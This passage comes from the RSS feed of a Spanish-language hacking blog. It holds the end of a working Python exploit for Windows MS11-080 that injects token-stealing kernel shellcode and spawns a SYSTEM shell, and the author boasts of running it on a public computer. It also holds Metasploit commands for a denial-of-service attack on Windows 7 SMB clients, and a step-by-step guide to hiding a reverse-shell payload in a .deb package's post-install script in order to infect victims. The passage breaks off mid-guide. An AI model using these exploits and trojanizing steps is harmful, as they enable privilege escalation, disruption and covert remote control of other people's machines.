shellcode_address_dep   = 0x0002071e
shellcode_address_nodep = 0x000207b8
padding           = "\x90"*2
HalDispatchTable0x4 = HalDispatchTable + 0x4
HalDispatchTable0x8 = HalDispatchTable + 0x8
## tokenbkaddr      = 0x00020900
if OS == "XP":
    _KPROCESS = "\x44"
    _TOKEN    = "\xc8"
    _UPID     = "\x84"
    _APLINKS  = "\x88"
else:
    _KPROCESS = "\x38"
    _TOKEN    = "\xd8"
    _UPID     = "\x94"
    _APLINKS  = "\x98"
     
restore_ptrs =   "\x31\xc0" + \
                 "\xb8" + struct.pack("L", HalpSetSystemInformation) + \
                 "\xa3" + struct.pack("L", HalDispatchTable0x8) + \
                 "\xb8" + struct.pack("L", HaliQuerySystemInformation) + \
                 "\xa3" + struct.pack("L", HalDispatchTable0x4)
tokenstealing =  "\x52"                                 +\
                 "\x53"                                 +\
                 "\x33\xc0"                             +\
                 "\x64\x8b\x80\x24\x01\x00\x00"         +\
                 "\x8b\x40" + _KPROCESS                 +\
                 "\x8b\xc8"                             +\
                 "\x8b\x98" + _TOKEN + "\x00\x00\x00"   +\
                 "\x89\x1d\x00\x09\x02\x00"             +\
                 "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
                 "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
                 "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
                 "\x75\xe8"                             +\
                 "\x8b\x90" + _TOKEN + "\x00\x00\x00"   +\
                 "\x8b\xc1"                             +\
                 "\x89\x90" + _TOKEN + "\x00\x00\x00"   +\
                 "\x5b"                                 +\
                 "\x5a"                                 +\
                 "\xc2\x10"
restore_token =  "\x52"                                 +\
                 "\x33\xc0"                             +\
                 "\x64\x8b\x80\x24\x01\x00\x00"         +\
                 "\x8b\x40" + _KPROCESS                 +\
                 "\x8b\x15\x00\x09\x02\x00"             +\
                 "\x89\x90" + _TOKEN + "\x00\x00\x00"   +\
                 "\x5a"                                 +\
                 "\xc2\x10"
                  
shellcode         = padding + restore_ptrs + tokenstealing
shellcode_size    = len(shellcode)
orig_size         = shellcode_size
# Write shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
                                   shellcode_size, byref(written))
# Write shellcode in userspace *(nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
                                   shellcode_size, byref(written))
## Trigger Pointer Overwrite
print "[*] Triggering AFDJoinLeaf pointer overwrite..."
IOCTL             = 0x000120bb                # AFDJoinLeaf
inputbuffer       = 0x1004
inputbuffer_size  = 0x108
outputbuffer_size = 0x0                       # Bypass Probe for Write
outputbuffer      = HalDispatchTable0x4 + 0x1 # HalDispatchTable+0x4+1
IoStatusBlock = c_ulong()
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
                                       None,
                                       None,
                                       None,
                                       byref(IoStatusBlock),
                                       IOCTL,
                                       inputbuffer,
                                       inputbuffer_size,
                                       outputbuffer,
                                       outputbuffer_size
                                       )
## Trigger shellcode
inp  = c_ulong()
out  = c_ulong()
inp  = 0x1337
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
## Spawn a system shell, w00t!
print "[*] Spawning a SYSTEM shell..."
os.system("cmd.exe /T:C0 /K cd c:\\windows\\system32")
 
############################## POST EXPLOITATION ###############################
print "[*] Restoring token..."
## Restore the thingie
shellcode         = padding + restore_ptrs + restore_token
shellcode_size    = len(shellcode)
trail_padding     = (orig_size - shellcode_size) * "\x00"
shellcode        += trail_padding
shellcode_size   += (orig_size - shellcode_size)
## Write restore shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
                                   shellcode_size, byref(written))
## Write restore shellcode in userspace (nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
                                   shellcode_size, byref(written))
## Overwrite HalDispatchTable once again
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
                                       None,
                                       None,
                                       None,
                                       byref(IoStatusBlock),
                                       IOCTL,
                                       inputbuffer,
                                       inputbuffer_size,
                                       outputbuffer,
                                       outputbuffer_size
                                       )
## Trigger restore shellcode
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
print "[+] Restore done! Have a nice day :)"&lt;/pre&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Lo acabo de probar en un computador público (y no muy actualizado) y el mayor problema que se me presentó fue que no tenia instalado python, pero simplemente bajo una versión &lt;b&gt;&lt;a href="http://portablepython.com/wiki/PortablePython2.7.2.1"&gt;Portable de Python&lt;/a&gt; &lt;/b&gt;y lo ejecuto, y funciona perfecto.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-t5GUKwIlGO8/Tt1y494uSNI/AAAAAAAAAaY/Qpn7n4urW-c/s1600/MS11-080.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="435" src="http://3.bp.blogspot.com/-t5GUKwIlGO8/Tt1y494uSNI/AAAAAAAAAaY/Qpn7n4urW-c/s640/MS11-080.bmp" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
También lo probé en un Windows XP actualizado y ahí no funciono.&lt;br /&gt;
&lt;br /&gt;
[+] Salu2&lt;br /&gt;
[+] Zion3R&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-2971523765706284278?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/cZkySTi46MwZVQ44wAw0qA_UHnA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/cZkySTi46MwZVQ44wAw0qA_UHnA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/cZkySTi46MwZVQ44wAw0qA_UHnA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/cZkySTi46MwZVQ44wAw0qA_UHnA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/1VIFA6KAZWU" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-05T22:44:55.755-03:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-tS_V1JZF6eQ/TtcBKZ9zMOI/AAAAAAAAAaQ/j9VDMSPQVJo/s72-c/break_windows.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2011/11/escalacion-de-privilegios-en-windows.html</feedburner:origLink></item><item><title>[Video Metasploit] Ataque DoS en Window 7</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/x_O_Q7AR_aw/video-metasploit-ataque-dos-en-window-7.html</link><category>Metasploit</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Mon, 28 Nov 2011 16:27:17 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-440168122623983480</guid><description>&lt;a href="http://1.bp.blogspot.com/-3aklih9y_DI/TtQe3t8aI0I/AAAAAAAAAaI/DKf2qKz7kWQ/s1600/aulahacker.gif" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="105" src="http://1.bp.blogspot.com/-3aklih9y_DI/TtQe3t8aI0I/AAAAAAAAAaI/DKf2qKz7kWQ/s200/aulahacker.gif" width="200" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Bueno, este video lo posteo para que practiquen con Metasploit y de manera "entretenida", es muy fácil de llevar a cabo. Y trata&amp;nbsp;esencialmente de una&amp;nbsp;vulnerabilidad&amp;nbsp;para &lt;i&gt;"dejar pegado"&lt;/i&gt; Windows 7.&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Este módulo se aprovecha de una falla de denegación de servicio en el cliente SMB de Windows 7 y Windows Server 2008 R2. Para provocar este error,&amp;nbsp;este módulo se&amp;nbsp;ejecuta como un servicio y fuerza a un cliente vulnerable a acceder a la IP de este sistema como un servidor SMB. Esto se puede lograr mediante la incorporación de una ruta UNC (\HOST\share\something) en una página web. La víctima tiene que acceder a la URL entregada por Metasploit usando Internet Explorer, o un documento Word.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Bueno, les dejo un video para que vean el funcionamiento del Módulo:&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;center&gt;&lt;iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/aZCL6yLr8yk" width="640"&gt;&lt;/iframe&gt;&lt;/center&gt;
&lt;br /&gt;
&lt;div style="text-align: right;"&gt;
Video hecho por Rahul Roshan &lt;a href="http://www.teamnuts.in/"&gt;www.teamnuts.in&lt;/a&gt;, &lt;a href="http://www.rahulroshan.in/"&gt;www.rahulroshan.in&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;./msfconsole
use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
set SRVHOST 192.168.1.7
exploit&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;b&gt;Opciones del módulo:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;table border="1" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-bottom-style: none; border-collapse: collapse; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; width: 588px;"&gt;
 &lt;tbody&gt;
&lt;tr style="height: 15.0pt; mso-yfti-firstrow: yes; mso-yfti-irow: 0;"&gt;
  &lt;td nowrap="" style="border: solid #7F7F7F 3.0pt; height: 15.0pt; mso-border-themecolor: text1; mso-border-themetint: 128; padding: 0cm 3.5pt 0cm 3.5pt; width: 157.0pt;" valign="top" width="209"&gt;&lt;div class="MsoNormal" style="margin-bottom: 0.0001pt;"&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 12pt;"&gt;&lt;b&gt;SRVHOST&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td nowrap="" style="border-left: none; border: solid #7F7F7F 3.0pt; height: 15.0pt; mso-border-left-alt: solid #7F7F7F 3.0pt; mso-border-left-themecolor: text1; mso-border-left-themetint: 128; mso-border-themecolor: text1; mso-border-themetint: 128; padding: 0cm 3.5pt 0cm 3.5pt; width: 284.35pt;" valign="top" width="379"&gt;&lt;div class="MsoNormal" style="margin-bottom: 0.0001pt;"&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 12pt;"&gt;Puerto
  Local a la escucha.&amp;nbsp;(default: 0.0.0.0)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr style="height: 15.0pt; mso-yfti-irow: 1;"&gt;
  &lt;td nowrap="" style="border-top: none; border: solid #7F7F7F 3.0pt; height: 15.0pt; mso-border-themecolor: text1; mso-border-themetint: 128; mso-border-top-alt: solid #7F7F7F 3.0pt; mso-border-top-themecolor: text1; mso-border-top-themetint: 128; padding: 0cm 3.5pt 0cm 3.5pt; width: 157.0pt;" valign="top" width="209"&gt;&lt;div class="MsoNormal" style="margin-bottom: 0.0001pt;"&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 12pt;"&gt;&lt;b&gt;SRVPORT&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td nowrap="" style="border-bottom: solid #7F7F7F 3.0pt; border-left: none; border-right: solid #7F7F7F 3.0pt; border-top: none; height: 15.0pt; mso-border-bottom-themecolor: text1; mso-border-bottom-themetint: 128; mso-border-left-alt: solid #7F7F7F 3.0pt; mso-border-left-themecolor: text1; mso-border-left-themetint: 128; mso-border-right-themecolor: text1; mso-border-right-themetint: 128; mso-border-top-alt: solid #7F7F7F 3.0pt; mso-border-top-themecolor: text1; mso-border-top-themetint: 128; padding: 0cm 3.5pt 0cm 3.5pt; width: 284.35pt;" valign="top" width="379"&gt;&lt;div class="MsoNormal" style="margin-bottom: 0.0001pt;"&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 12pt;"&gt;Puerto
  a la&amp;nbsp;escucha&amp;nbsp;SMB (default: 445)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr style="height: 15.0pt; mso-yfti-irow: 2;"&gt;
  &lt;td nowrap="" style="border-top: none; border: solid #7F7F7F 3.0pt; height: 15.0pt; mso-border-themecolor: text1; mso-border-themetint: 128; mso-border-top-alt: solid #7F7F7F 3.0pt; mso-border-top-themecolor: text1; mso-border-top-themetint: 128; padding: 0cm 3.5pt 0cm 3.5pt; width: 157.0pt;" valign="top" width="209"&gt;&lt;div class="MsoNormal" style="margin-bottom: 0.0001pt;"&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 12pt;"&gt;&lt;b&gt;SSL&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td nowrap="" style="border-bottom: solid #7F7F7F 3.0pt; border-left: none; border-right: solid #7F7F7F 3.0pt; border-top: none; height: 15.0pt; mso-border-bottom-themecolor: text1; mso-border-bottom-themetint: 128; mso-border-left-alt: solid #7F7F7F 3.0pt; mso-border-left-themecolor: text1; mso-border-left-themetint: 128; mso-border-right-themecolor: text1; mso-border-right-themetint: 128; mso-border-top-alt: solid #7F7F7F 3.0pt; mso-border-top-themecolor: text1; mso-border-top-themetint: 128; padding: 0cm 3.5pt 0cm 3.5pt; width: 284.35pt;" valign="top" width="379"&gt;&lt;div class="MsoNormal" style="margin-bottom: 0.0001pt;"&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 12pt;"&gt;Negociación
  SSL para conexiones entrantes.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr style="height: 15.0pt; mso-yfti-irow: 3;"&gt;
  &lt;td nowrap="" style="border-top: none; border: solid #7F7F7F 3.0pt; height: 15.0pt; mso-border-themecolor: text1; mso-border-themetint: 128; mso-border-top-alt: solid #7F7F7F 3.0pt; mso-border-top-themecolor: text1; mso-border-top-themetint: 128; padding: 0cm 3.5pt 0cm 3.5pt; width: 157.0pt;" valign="top" width="209"&gt;&lt;div class="MsoNormal" style="margin-bottom: 0.0001pt;"&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 12pt;"&gt;&lt;b&gt;SSLVersion&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td nowrap="" style="border-bottom: solid #7F7F7F 3.0pt; border-left: none; border-right: solid #7F7F7F 3.0pt; border-top: none; height: 15.0pt; mso-border-bottom-themecolor: text1; mso-border-bottom-themetint: 128; mso-border-left-alt: solid #7F7F7F 3.0pt; mso-border-left-themecolor: text1; mso-border-left-themetint: 128; mso-border-right-themecolor: text1; mso-border-right-themetint: 128; mso-border-top-alt: solid #7F7F7F 3.0pt; mso-border-top-themecolor: text1; mso-border-top-themetint: 128; padding: 0cm 3.5pt 0cm 3.5pt; width: 284.35pt;" valign="top" width="379"&gt;&lt;div class="MsoNormal" style="margin-bottom: 0.0001pt;"&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 12pt;"&gt;Especifica
  la versión de SSL que debería ser usada (aceptada: SSL2, SSL3, TLS1)
  (default: SSL3)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr style="height: 15.0pt; mso-yfti-irow: 4;"&gt;
  &lt;td nowrap="" style="border-top: none; border: solid #7F7F7F 3.0pt; height: 15.0pt; mso-border-themecolor: text1; mso-border-themetint: 128; mso-border-top-alt: solid #7F7F7F 3.0pt; mso-border-top-themecolor: text1; mso-border-top-themetint: 128; padding: 0cm 3.5pt 0cm 3.5pt; width: 157.0pt;" valign="top" width="209"&gt;&lt;div class="MsoNormal" style="margin-bottom: 0.0001pt;"&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 12pt;"&gt;&lt;b&gt;ListenerComm&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td nowrap="" style="border-bottom: solid #7F7F7F 3.0pt; border-left: none; border-right: solid #7F7F7F 3.0pt; border-top: none; height: 15.0pt; mso-border-bottom-themecolor: text1; mso-border-bottom-themetint: 128; mso-border-left-alt: solid #7F7F7F 3.0pt; mso-border-left-themecolor: text1; mso-border-left-themetint: 128; mso-border-right-themecolor: text1; mso-border-right-themetint: 128; mso-border-top-alt: solid #7F7F7F 3.0pt; mso-border-top-themecolor: text1; mso-border-top-themetint: 128; padding: 0cm 3.5pt 0cm 3.5pt; width: 284.35pt;" valign="top" width="379"&gt;&lt;div class="MsoNormal" style="margin-bottom: 0.0001pt;"&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 12pt;"&gt;Especifica
  el canal de de comunicación para este servicio&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr style="height: 15.0pt; mso-yfti-irow: 5;"&gt;
  &lt;td nowrap="" style="border-top: none; border: solid #7F7F7F 3.0pt; height: 15.0pt; mso-border-themecolor: text1; mso-border-themetint: 128; mso-border-top-alt: solid #7F7F7F 3.0pt; mso-border-top-themecolor: text1; mso-border-top-themetint: 128; padding: 0cm 3.5pt 0cm 3.5pt; width: 157.0pt;" valign="top" width="209"&gt;&lt;div class="MsoNormal" style="margin-bottom: 0.0001pt;"&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 12pt;"&gt;&lt;b&gt;WORKSPACE&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td nowrap="" style="border-bottom: solid #7F7F7F 3.0pt; border-left: none; border-right: solid #7F7F7F 3.0pt; border-top: none; height: 15.0pt; mso-border-bottom-themecolor: text1; mso-border-bottom-themetint: 128; mso-border-left-alt: solid #7F7F7F 3.0pt; mso-border-left-themecolor: text1; mso-border-left-themetint: 128; mso-border-right-themecolor: text1; mso-border-right-themetint: 128; mso-border-top-alt: solid #7F7F7F 3.0pt; mso-border-top-themecolor: text1; mso-border-top-themetint: 128; padding: 0cm 3.5pt 0cm 3.5pt; width: 284.35pt;" valign="top" width="379"&gt;&lt;div class="MsoNormal" style="margin-bottom: 0.0001pt;"&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 12pt;"&gt;Especifica
  el lugar de trabajo para este módulo&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr style="height: 15.0pt; mso-yfti-irow: 6;"&gt;
  &lt;td nowrap="" style="border-top: none; border: solid #7F7F7F 3.0pt; height: 15.0pt; mso-border-themecolor: text1; mso-border-themetint: 128; mso-border-top-alt: solid #7F7F7F 3.0pt; mso-border-top-themecolor: text1; mso-border-top-themetint: 128; padding: 0cm 3.5pt 0cm 3.5pt; width: 157.0pt;" valign="top" width="209"&gt;&lt;div class="MsoNormal" style="margin-bottom: 0.0001pt;"&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 12pt;"&gt;&lt;b&gt;TCP::max_send_size&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td nowrap="" style="border-bottom: solid #7F7F7F 3.0pt; border-left: none; border-right: solid #7F7F7F 3.0pt; border-top: none; height: 15.0pt; mso-border-bottom-themecolor: text1; mso-border-bottom-themetint: 128; mso-border-left-alt: solid #7F7F7F 3.0pt; mso-border-left-themecolor: text1; mso-border-left-themetint: 128; mso-border-right-themecolor: text1; mso-border-right-themetint: 128; mso-border-top-alt: solid #7F7F7F 3.0pt; mso-border-top-themecolor: text1; mso-border-top-themetint: 128; padding: 0cm 3.5pt 0cm 3.5pt; width: 284.35pt;" valign="top" width="379"&gt;&lt;div class="MsoNormal" style="margin-bottom: 0.0001pt;"&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 12pt;"&gt;Máximo
  tamaño tcp. &lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Times New Roman', serif; font-size: 12pt;"&gt;(0 = disable)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr style="height: 15.0pt; mso-yfti-irow: 7; mso-yfti-lastrow: yes;"&gt;
  &lt;td nowrap="" style="border-top: none; border: solid #7F7F7F 3.0pt; height: 15.0pt; mso-border-themecolor: text1; mso-border-themetint: 128; mso-border-top-alt: solid #7F7F7F 3.0pt; mso-border-top-themecolor: text1; mso-border-top-themetint: 128; padding: 0cm 3.5pt 0cm 3.5pt; width: 157.0pt;" valign="top" width="209"&gt;&lt;div class="MsoNormal" style="margin-bottom: 0.0001pt;"&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 12pt;"&gt;&lt;b&gt;TCP::send_delay&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td nowrap="" style="border-bottom: solid #7F7F7F 3.0pt; border-left: none; border-right: solid #7F7F7F 3.0pt; border-top: none; height: 15.0pt; mso-border-bottom-themecolor: text1; mso-border-bottom-themetint: 128; mso-border-left-alt: solid #7F7F7F 3.0pt; mso-border-left-themecolor: text1; mso-border-left-themetint: 128; mso-border-right-themecolor: text1; mso-border-right-themetint: 128; mso-border-top-alt: solid #7F7F7F 3.0pt; mso-border-top-themecolor: text1; mso-border-top-themetint: 128; padding: 0cm 3.5pt 0cm 3.5pt; width: 284.35pt;" valign="top" width="379"&gt;&lt;div class="MsoNormal" style="margin-bottom: 0.0001pt;"&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 12pt;"&gt;Retraso
  entre cada envío.&amp;nbsp;(0 = disable)&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Referencias:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-0017"&gt;CVE-2010-0017&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.osvdb.org/62244"&gt;OSVDB-62244&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/MS10-006.mspx"&gt;MSB-MS10-006&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
[+] Salu2&lt;/div&gt;
&lt;div&gt;
[+] Zion3R&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-440168122623983480?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/s0ZkvPIi3Ofi9wU-k3X5UGANH_M/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/s0ZkvPIi3Ofi9wU-k3X5UGANH_M/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/s0ZkvPIi3Ofi9wU-k3X5UGANH_M/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/s0ZkvPIi3Ofi9wU-k3X5UGANH_M/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/x_O_Q7AR_aw" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-28T21:27:17.257-03:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-3aklih9y_DI/TtQe3t8aI0I/AAAAAAAAAaI/DKf2qKz7kWQ/s72-c/aulahacker.gif" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2011/11/video-metasploit-ataque-dos-en-window-7.html</feedburner:origLink></item><item><title>[Video Metasploit] Troyanizando un paquete *.deb</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/C0jNL4tI2lw/video-metasploit-troyanizando-un.html</link><author>noreply@blogger.com (Zion3R)</author><pubDate>Mon, 21 Nov 2011 18:18:00 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-3592992440108692807</guid><description>&lt;div style="text-align: justify;"&gt;
&lt;a href="http://2.bp.blogspot.com/-GbnhsgKa3T0/TW3FHwlB8TI/AAAAAAAAAQA/NyAXxt8Vgn0/s1600/metasploit-logo.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="131" src="http://2.bp.blogspot.com/-GbnhsgKa3T0/TW3FHwlB8TI/AAAAAAAAAQA/NyAXxt8Vgn0/s200/metasploit-logo.png" width="200" /&gt;&lt;/a&gt;Quiero postear este video que lo encontré bastante interesante y útil ya que una de las formas más faciles de acceder a un sistema es simplemente enviando un archivo infectado con cualquier tipo de malware (Troyano, keylogger, backdoor, etc...) a nuestra victima y que mejor forma para infectar un Linux que hacerle creer a la víctima que está instalando un simple paquete *.deb con un regalito dentro, a continuación el video y la explicación:&lt;span id="goog_1592547193"&gt;&lt;/span&gt;&lt;span id="goog_1592547194"&gt;&lt;/span&gt;&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;center&gt;&lt;iframe allowfullscreen="" frameborder="0" height="480" src="http://www.youtube.com/embed/-Xm3Pwhw8XI" width="640"&gt;&lt;/iframe&gt;&lt;/center&gt;&lt;br /&gt;
* Bajar el paquete a infectar:&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;apt-get --download-only install pakete&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
* Moverlo donde trabajaremos:&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;mv /var/cache/apt/archives/pakete /area/de/trabajo&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
* Extraerlo:&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;dpkg -x pakete work&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
* Crear la carpeta que nos ayudará para el payload de infección:&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;mkdir work/DEBIAN&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
* En el directorio "DEBIAN", crear un archivo llamado "control" que tenga lo siguiente (se modifica según necesidad):&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;Package: pakete
Version: 1000000000
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MATU Developers (ubuntu-motu@lists.ubuntu.com)
Description: game&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
* También hay que crear el script de post-instalación que ejecutará nuestro binario. En "DEBIAN" creamos el archivo llamado "postinst" que contiene los siguiente:&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;#!/bin/sh
sudo chmod 2755 /usr/games/pakete_scores &amp;amp;&amp;amp; /usr/games/pakete_scores &amp;amp; /usr/games/pakete &amp;amp;&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
* Cambiamos permisos a postinst:&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;chmod a+x postinst&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
* Ahora vamos a crear nuestro payload malicioso. Creamos una shell inversa para que se conecte de nuevo a nosotros llamada "pakete_scores".&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;./msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=4444 X &amp;gt; /area/de/trabajo/work/usr/games/pakete_scores&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
* Hacer el payload ejecutable, el archivo de construcción será llamado ".deb", lo cambiamos a pakete.deb:&lt;br /&gt;
